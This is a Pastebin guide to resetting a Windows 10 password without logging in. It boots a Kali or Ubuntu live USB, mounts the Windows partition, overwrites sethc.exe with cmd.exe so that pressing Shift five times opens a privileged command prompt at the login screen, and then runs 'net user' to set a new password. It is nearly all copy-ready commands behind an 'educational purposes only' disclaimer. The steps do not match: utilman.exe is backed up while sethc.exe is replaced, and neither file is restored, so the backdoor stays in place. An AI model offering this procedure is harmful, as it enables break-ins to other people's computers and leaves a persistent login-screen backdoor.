Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- How to reset windows 10 password without logging in ( Reset Windows 10 password using Kali Linux/Ubuntu )
- Note: This guide is for educational purposes only. Do not attempt on your primary system; it may cause data loss. Always use a legitimate license and practice on a virtual machine.
- Steps to Reset Windows 10 Password Using Ubuntu:
- Insert a Live USB (Kali or Ubuntu) and boot your system to access the root shell.
- 1. Identify the Windows Partition
- Use the following command to list the available partitions:
- $ lsblk
- Locate the Windows partition (typically `/dev/sda1`).
- 2. Mount the Windows Partition
- Create a mount point and mount the partition:
- $ sudo mkdir /mnt/windows
- $ sudo mount /dev/sda1 /mnt/windows
- 3. Backup and Replace Utility Files
- Navigate to the `System32` directory where the utility files are located:
- $ cd /mnt/windows/Windows/System32
- Backup the `utilman.exe` file:
- $ sudo cp utilman.exe utilman.exe.bak
- Replace `sethc.exe` with `cmd.exe`:
- $ sudo cp cmd.exe sethc.exe
- 4. Unmount the Windows Partition
- After making the changes, unmount the partition:
- $ sudo umount /mnt/windows
- 5. Reboot the System
- Reboot the system into Windows:
- $ sudo reboot
- 6. Reset the Windows Password
- Once the system has rebooted and you are on the login screen, press the `Shift` key five times to open a command prompt window. In the command prompt, run the following command to reset the password for the user account (replace `demo` with the username and `123456` with the new password):
- $ net user demo 123456
- Telegram post https://t.me/efxtv/4018
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement